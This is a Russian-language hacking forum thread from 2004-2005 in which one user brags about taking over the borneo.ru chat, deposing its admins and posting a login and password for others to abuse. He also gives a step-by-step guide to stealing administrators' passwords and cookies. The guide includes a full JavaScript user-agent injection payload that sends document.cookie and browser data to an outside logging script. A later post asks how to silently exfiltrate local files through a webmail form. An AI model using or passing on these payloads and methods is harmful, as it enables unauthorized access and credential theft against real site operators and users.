Чаты Последняя новость...

Discussion in 'Веб-уязвимости' started by Dmitro, 25 Dec 2004.

  1. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    Здаров, подельники !
    Вот тока что ломанул опять borneo.ru

    тока вот он меня подзае... уже , какой то ламерский.
    я щас там эмпичмент устроил - всех админов перекилял... а себя объявил супервайзером (выше рангом)
    но какой то м.. успел в админку залесть и запретил у админов теги и всё такое...

    Кстати, если кто хочет побаловаться , то мой пароль:
    000 ( ноль ноль ноль ), а логин - yakubin.

    якубин - потому что когда то меня типо спалили по ip ,
    и нашли какого то мальчика из лисок по этой фамилии.... придурки ! Причём они свято верят, что ip у каждого чела индивидуальный. :rolleyes:
    тока когда зайдёте туда , список команд посмотрите в помощи или в конституции...
    есть и др. команды (-invis) - невидимый (-kill) - убить , и т.д.
    ну да ладно...
    Всем спасибо за внимание !
    :cool:
     
  2. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    подсказка ленивым

    Тфу блин, посмотрел сегодня как вы там пытались чёто сделать ...
    Объясняю ленивым :
    чтобы команду ввести, нужно сначала щёлкнуть справа на чейнибудь ник, в строке появится:
    /VASYA , а потом {-команда}
    пример:
    /vasya -kill
    между ником и командой 1 пробел и дефиз обязательно.
    вот некоторые команды:
    .... -clear очистить
    .... -ban банить
    .... -off выкинуть из чата
    .... -on
    .... -invis невидимый
    .... -ip
    .... -list список присут-х
    .... -unban разбанить
    ..... -status guest (admin, supervisor, dj, aborigen, ) статус
    .... -tell трали-вали вместо трали-вали текст (говорить от чужого имени)

    И когда будите бяку делать, то перед командой пусть будет ник не ваш, а ламера....

    Кстати за IP можете уже не бояться, когда вызываешь команду -ip на наш ник , я оставил сюрприз ... - будет идти снег под музыку секретных материалов, порнокартинки, огромные надписи, + снифер в общак + <xml> конец отображаемого документа. можете попробовать перед уходом:
    /yakubin -ip

    Всё .. пока!! :cool:

    здесь чат
     
  3. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    вот так вот (((

    Эх, открою поцики правду:
    На самом деле, когда у меня что-то не получается взломать, то я для успокаения души ломаю всякое дерьмо ламерское..... :(


    Да, кстати это уже не актуально, там базу почистили...


    Миру-мир !
    а войне одни пиписьки, и чтоб у каждой бабы были здоровенные сиськи...
    пока !
     
    #3 Dmitro, 27 Dec 2004
    Last edited: 27 Dec 2004
  4. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Dmitro - ты бы лучше описал подродно что там делал.
     
  5. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    Да не вопрос конечно..

    Не знаю зачем это писать, я уже рассказывал всё...
    ну если надо, то:
    Повторю новичкам...
    Если чат или там форум какойнть - Лоховской и в строке браузера (в URL) прописывается ник и пароль, или что-то интересное для нас, и если нельзя просто вставить снифер, то :
    1) качаем аноним про 6. ЗДЕСЬ
    там же серийник.. Если чё не качается - ну найдите сами (Steganos Internet Anonym Pro версия 6)
    Запускайте, она немного поработает и надо вручную выбрать прокси , обязательно проверить на анонистность лучше ЗДЕСЬ
    потом в меню "Безопасность" - "Юзерагент" вставляем
    скрипт ( в одну строчку ) :


    Здесь выдумайте юзерагента (просто текст от балды)<Script language="JavaScript"> if(navigator.userAgent.indexOf('IRIX') != -1) { var OpSys = "Irix"; } else if((navigator.userAgent.indexOf('Win') != -1) && (navigator.userAgent.indexOf('95') != -1)) { var OpSys = "Windows 95"; } else if(navigator.userAgent.indexOf('Win') != -1) { var OpSys = "Windows 3.1 or NT"; } else if(navigator.userAgent.indexOf('Mac') != -1) { var OpSys = "Macintosh"; } else { var OpSys = "Other"; }date= new Date();zone= date.getTimezoneOffset();gmt= date.toGMTString();bname=navigator.appName;bversio n=navigator.appVersion;if (bname=="Netscape"){bplugins=navigator.plugins.length;}if (bname=="Netscape"){address=java.net.InetAddress.getLocalHost(); ip=address.getHostAddress();}loc=location.href;mod i=document.lastModified;refer=document.referrer;if (bname=="Netscape"){var tools=java.awt.Toolkit.getDefaultToolkit();var size=tools.getScreenSize();w=size.width;h=size.hei ght;}</Script><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+refer+loc+OpSys+modi+date+bname+bversion+document.cookie;</script>

    (проверьте чтоб работал, если чё проверьте - нет ли пробелов лишних..)

    2) Регистрируйтесь гденьть (скрипт где то останется вкач-ве инфы о вас) .... Если можете сделать скрипт непосредственно в инфе, то просто его впишите...

    3) Привлекаем к себе внимание в чате или в форуме.. ( эт уж как придумаете..)

    4) Сволочной админ смотрит ваш IP , там же и юзерагент... (скрипт)

    5) Смотрим лог
    ЗДЕСЬ

    6) ТАМ ПАРОЛЬ СВОЛОЧУГИ.... либо кукисы +++ всякое дерьмо о нём...

    7) А теперь прошу прощения, у меня через 3 часа поезд на павелецком, а я ещё х.. собрался и фигнёй страдаю )))

    Приеду числа 10го после праздников и напишу, как получить тем же методом ВСЕ !! куки и открыть порты у СВОЛОЧУГИ без троянов....
    Прссстите про порты чуть позже, пока не наигрался ишо... И пусть algol не говорит, что нельзя чёта из обычного html - скриптами можно ВСЁ!!! , только надо быть творческим челом... А я всё же прошу помочь в теме "вопрос к алголу" по поводу перекрытия кавычки (это супеваЖно!!!)

    Поцики, я искренне уважаю хакеров, но я сам ещё такой L ... подскажите тем кто спрашивает, ёп , сами ж такими были кадато...

    Всё пока! я правда опаздываю, а у нас такси ибунячих денег стоит.....
     
    #5 Dmitro, 27 Dec 2004
    Last edited: 27 Dec 2004
  6. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    А хтонть ломал love.rambler.ru ????:) Там хорошая перспектива для раскрутки своего сайта...
     
    #6 Dmitro, 16 Jan 2005
    Last edited: 16 Jan 2005
  7. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    Как явное сделать тайным?

    у меня как всегда наивный вопрос:
    есть такая штука как "яндекс сенд мейл",
    к примеру... =>
    form action="http://mail.yandex.ru/send" enctype="multipart/form-data" method="post" name="sendmessage"
    Но самое интересное :
    input type="file" size="32" name="att" class="wideFile" value="c:file.com"
    если так сделать, то перед угоном файла выскакивает предупреждение об угоне , там есть OK , и теперь самое интересное:
    (тупой вопрос) моЖно ли ??????
    или я очередной раз страдаю иллюзиями ?